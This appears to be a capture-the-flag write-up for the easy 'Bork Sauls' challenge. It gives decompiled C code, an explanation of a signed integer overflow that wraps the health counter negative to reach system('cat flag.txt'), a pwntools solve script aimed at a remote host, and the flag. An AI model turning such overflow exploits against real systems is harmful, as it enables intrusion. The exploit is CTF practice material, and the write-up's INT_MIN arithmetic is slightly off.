Bork Sauls - CyberEDU
Bork Sauls - CyberEDU
Flag : ctf{d8194ce78a6c555adae9c14fe56674e97ba1afd88609c99dcb95fc599dcbc9f5}
- Difficulty: Easy
Firstly, I decompiled the file to see what is inside.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
undefined8 main(EVP_PKEY_CTX *param_1)
{
int local_14;
int local_10;
uint local_c;
init(param_1);
local_c = 100000;
local_10 = 0;
puts("You enter the room, and you meet the Dancer of the Boreal Valley. You have 3 options.");
do {
puts("Choose: \n1.Roll\n2.Hit(only 3 times)\n3.Throw Estus flask at the boss (wut?)\n4.Alt-F4\n"
);
__isoc99_scanf(&DAT_001020b5,&local_14);
if (local_14 == 3) {
local_c = local_c + 1999999;
}
else if (local_14 < 4) {
if (0 < local_14) {
if (local_10 < 3) {
local_c = local_c - 30000;
}
local_10 = local_10 + 1;
}
}
else if (local_14 == 4) {
/* WARNING: Subroutine does not return */
exit(0);
}
printf("Health: %d\n",(ulong)local_c);
} while (-1 < (int)local_c);
printf("Congratulations. Here\'s your flag: ");
system("cat flag.txt");
return 0;
}
I understand what I need to do :
1
if(-1 > (int)local_c);
I will go on pass to the instruction where cat flag
OK, but in normal mode you think it’s impossible. Hmm, INT_MAX = 2147483647, but what happened if you increment the “INT_MAX” => INT_MIN = -INT_MAX = -2147483647 which is negative => GG
Solve script:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *
context.log_level = "debug"
r = remote("34.159.73.134", 30149)
#r = process("./bork_sauls")
INT_MAX = 2147483647 # maximum value of an int (C/C++)
health = 100000
health_added = 1999999
while health < INT_MAX:
health += health_added
r.recvuntil(b"4.Alt-F4")
r.sendline(b"3")
r.recvuntil(b"Here's your flag: ")
flag = r.recvline().strip().decode()
print(flag)
This post is licensed under CC BY 4.0 by the author.